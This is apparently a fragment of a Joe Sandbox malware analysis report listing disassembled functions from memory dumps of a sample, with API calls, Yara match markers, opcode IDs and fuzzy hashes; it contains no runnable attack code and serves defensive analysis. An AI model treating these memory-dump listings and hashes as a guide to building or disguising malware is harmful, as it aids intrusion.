                                                  • Instruction Fuzzy Hash: 6C0165B1444B019BE720EF66C506749FBE0AF40319F20891FE495666E1CBB89A45CB58
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                  • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-
                                                  • API String ID: 3177248105-2084034818
                                                  • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                  • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction ID: 8ec614d2e68f5847cdab36d5c1b166ed75c8c05dfdab0d31a35a8bf3d15cb102
                                                  • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction Fuzzy Hash: DCB14471A122859FDB11CF28C8417FFBBA5EF45340F15856BE844AB342D2388D92CB6A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction ID: 5ca8a2c9336db485a1c3fdd503357e74669f01e8cf1af51e2f1252c2e13aedda
                                                  • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction Fuzzy Hash: 36B11872901245AFDB16CFA8C8817FEBBE7EF95340F25C1A9E8499B341D6348D41CB62
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00661B2C
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00661B4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID:
                                                  • API String ID: 3197321146-0
                                                  • Opcode ID: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                  • Instruction ID: 239d476c893748aff447d016131d578de025fe5a40e3f281d303f7724ffe9700
                                                  • Opcode Fuzzy Hash: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                  • Instruction Fuzzy Hash: BEC16770A002189FEB64CF24CD85BEAB7BAFF49304F5441D8E409AB691DB71AE85CF54
                                                  APIs
                                                    • Part of subcall function 00404150: ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                  • std::locale::_Init.LIBCPMT ref: 0040A0CE
                                                    • Part of subcall function 0040C516: std::_Lockit::_Lockit.LIBCPMT ref: 0040C528
                                                    • Part of subcall function 0040C516: std::locale::_Setgloballocale.LIBCPMT ref: 0040C543
                                                    • Part of subcall function 0040C516: _Yarn.LIBCPMT ref: 0040C559
                                                    • Part of subcall function 0040C516: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C599
                                                    • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                    • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                    • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                    • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                  • std::locale::_Init.LIBCPMT ref: 0040A191
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2A8
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2AD
                                                    • Part of subcall function 004015C0: ___std_exception_copy.LIBVCRUNTIME ref: 004015FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Concurrency::cancel_current_taskInit___std_exception_copy$SetgloballocaleYarn
                                                  • String ID:
                                                  • API String ID: 3444572950-0
                                                  • Opcode ID: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                  • Instruction ID: 15dc990f8168f4d2899df3e18d3cde1c15f8de658f0e16a424ba317a0bc9b0b8
                                                  • Opcode Fuzzy Hash: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                  • Instruction Fuzzy Hash: 6DA137B0900205DFDB00CF55C594B9ABBF0FF49304F1582AAE809AF792D7BAA954CF95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction ID: e8452a54d6043e1b743c3d42dff45856ced14499e589d53c32b50beca8cb4aa0
                                                  • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction Fuzzy Hash: A8510472A04602AFDB349F55D841B7AB3A4EF01708F14043FE90567AE1D739EC8AC788
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                  • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction ID: bef5814f672ae83d0874dee4e4ccf8e4d64a0203b9483577e0a67e298415a22a
                                                  • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction Fuzzy Hash: 1151E272601706EFFB298F94C841BBAB7A6EF10310F64812DE84947391E772ED91C7A4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3556499859-0
                                                  • Opcode ID: 17854ea664a45eb01664c1a20a8cf02ccb9de1dc8606da2d7d461c4ca62b6241
                                                  • Instruction ID: a0b3ace8011b5933849424b90c9485ba5dbbed8ad4db6b918f4ddbde63b50411
                                                  • Opcode Fuzzy Hash: 17854ea664a45eb01664c1a20a8cf02ccb9de1dc8606da2d7d461c4ca62b6241
                                                  • Instruction Fuzzy Hash: 3B3160759003089BFB10BF75AD0971A3EB1AF4932B710063BE900A66B2DB78C454CE5D
                                                  APIs
                                                    • Part of subcall function 004161E8: _free.LIBCMT ref: 004161F6
                                                    • Part of subcall function 0041B58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0041BAF6,?,00000000,00000000), ref: 0041B63A
                                                  • GetLastError.KERNEL32 ref: 0041E1D7
                                                  • __dosmaperr.LIBCMT ref: 0041E1DE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E21D
                                                  • __dosmaperr.LIBCMT ref: 0041E224
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                  • Instruction ID: bdb0a842771a8fe777460e77f8a474c5cbd3e2640c7d3f46f2ac3ce91a7366d8
                                                  • Opcode Fuzzy Hash: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                  • Instruction Fuzzy Hash: CD21B275600205BFAB206F67CC819EBB7ADEE043A8310852EFD2587251D738EC818B99
                                                  APIs
                                                    • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                    • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                  • GetLastError.KERNEL32 ref: 10007C36
                                                  • __dosmaperr.LIBCMT ref: 10007C3D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                  • __dosmaperr.LIBCMT ref: 10007C83
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                  • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                  APIs
                                                    • Part of subcall function 0067644F: _free.LIBCMT ref: 0067645D
                                                    • Part of subcall function 0067B7F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,V.h,0000FDE9,00000000,?,?,?,00682BCF,0000FDE9,00000000,?), ref: 0067B8A1
                                                  • GetLastError.KERNEL32 ref: 0067E43E
                                                  • __dosmaperr.LIBCMT ref: 0067E445
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0067E484
                                                  • __dosmaperr.LIBCMT ref: 0067E48B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                  • Instruction ID: 32a1f65e23eb84ac150400426078082bdfa03548b9edef8c6a145fc898552b37
                                                  • Opcode Fuzzy Hash: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                  • Instruction Fuzzy Hash: F421C171600215AFDB60AF65CC8196BB7EEEF483B8710C5A9F91C97244E732EC058BA4
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044C4EE
                                                    • Part of subcall function 004421CA: __getptd.LIBCMT ref: 004421DD
                                                    • Part of subcall function 0044302A: __getptd_noexit.LIBCMT ref: 0044302A
                                                  • ___ascii_strnicmp.LIBCMT ref: 0044C561
                                                  • __tolower_l.LIBCMT ref: 0044C583
                                                  • __tolower_l.LIBCMT ref: 0044C592
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__getptd__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 2744284823-0
                                                  • Opcode ID: fc53079f3506a87612cd62d25356a17a7fe58b84f43b47a09e679809effddfaa
                                                  • Instruction ID: 5990bd2846e973212e6052148c3277e8f9eabc76f2dbf69ab6be36eb4c05885c
                                                  • Opcode Fuzzy Hash: fc53079f3506a87612cd62d25356a17a7fe58b84f43b47a09e679809effddfaa
                                                  • Instruction Fuzzy Hash: 0121D571901265ABEB61EEA9C88577F3BA4AF40325F1C065BE420572C1EB78EE01C799
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction ID: 326734504838d1fa4505021c0279ca40da321d56dfe3ccfc5f984e35bfb0d14e
                                                  • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction Fuzzy Hash: 3321EB71A05220ABCF328724AC85F6B37DA9F01BA0F258525ED0AA7390DA30ED01D6F4
                                                  APIs
                                                  • GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                  • _free.LIBCMT ref: 00418E85
                                                  • _free.LIBCMT ref: 00418EBB
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                  • Instruction ID: 0e464f2806eaeac5f9ced7654bcd696cc8e1c911a26352911ac68216619f9860
                                                  • Opcode Fuzzy Hash: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                  • Instruction Fuzzy Hash: 8311E0723097057ACF212A76AC95EEB22599BC17A8B25063FF125C22E1DE6D8CC6512C
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                  • _free.LIBCMT ref: 10006EFE
                                                  • _free.LIBCMT ref: 10006F34
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                  • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                  APIs
                                                  • GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                  • _free.LIBCMT ref: 006790EC
                                                  • _free.LIBCMT ref: 00679122
                                                  • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                  • Instruction ID: eaaba3ad0b3f26dcc8de7e2f306d23e649f4dc23bdab8a8dc306ebaca0a58f13
                                                  • Opcode Fuzzy Hash: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                  • Instruction Fuzzy Hash: D51106723442027BDBA17378AC86D6B25DB8BC2374B24823CF62C863E1DE708C165138
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00411406,0041A3D8,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?), ref: 00418F7F
                                                  • _free.LIBCMT ref: 00418FDC
                                                  • _free.LIBCMT ref: 00419012
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041901D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                  • Instruction ID: 81bc8fc7cbd95881107e9ffec5a672ab3f5eab8e02c6baa7b337ffd9db964308
                                                  • Opcode Fuzzy Hash: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                  • Instruction Fuzzy Hash: ED1182723096013A9B212B76AC95EEB265A9BC1378725023FF515832D1DE6D8CC6612D
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                  • _free.LIBCMT ref: 10007055
                                                  • _free.LIBCMT ref: 1000708B
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                  • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0067166D,0067A63F,?,?,0066E3C2,?,?,?,00661344,?,006636FE,?,?), ref: 006791E6
                                                  • _free.LIBCMT ref: 00679243
                                                  • _free.LIBCMT ref: 00679279
                                                  • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0066E3C2,?,?,?,00661344,?,006636FE,?,?,?), ref: 00679284
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                  • Instruction ID: 8e8ea4547c373c43c0e8c8839ff1d3c5790221e92a174b4c9bbf7d33a9388589
                                                  • Opcode Fuzzy Hash: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                  • Instruction Fuzzy Hash: B71108727682013ADBA173786C82D6B31DB9BC2774725823CF13C823E3EE618D025538
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,006710AF,?,?,00438470,00000000,?,006711DA,00000004,00429BA4,00429B9C,00429BA4,00000000), ref: 0067107E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction ID: 296f0f3812af10b8511fec56b4b4b0acda9b8ab644f784729a80686eb17a30e3
                                                  • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction Fuzzy Hash: A811A731A41265ABDF32476C9C41B9D77A5AF03760F158126F908EF380DE70ED8186E4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                  • Instruction ID: e0c668815703d1d59582e6ca7f758466f92a31949dcfe0f64d421cfcc3a852cc
                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                  • Instruction Fuzzy Hash: 2611803244014EBBDF265E84CC41CEE3F23BB19354F18895AFE1959130C33AC9B2AB89
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00447CF5
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __amsg_exit.LIBCMT ref: 00447D15
                                                  • __lock.LIBCMT ref: 00447D25
                                                  • _free.LIBCMT ref: 00447D55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 3170801528-0
                                                  • Opcode ID: fd68ba0e788f4be4d7a00be197a65ee7ad184e4e4821859db9fe28f15118f46c
                                                  • Instruction ID: b35939f623d063ddefa623e84f5d7e38cc17f234ab8fc3f37df43591ee48b569
                                                  • Opcode Fuzzy Hash: fd68ba0e788f4be4d7a00be197a65ee7ad184e4e4821859db9fe28f15118f46c
                                                  • Instruction Fuzzy Hash: 2101A1B2D08B11EBF711AF65980676E7360BF4471AF14401BE81067692CB3C9A83CBDD
                                                  APIs
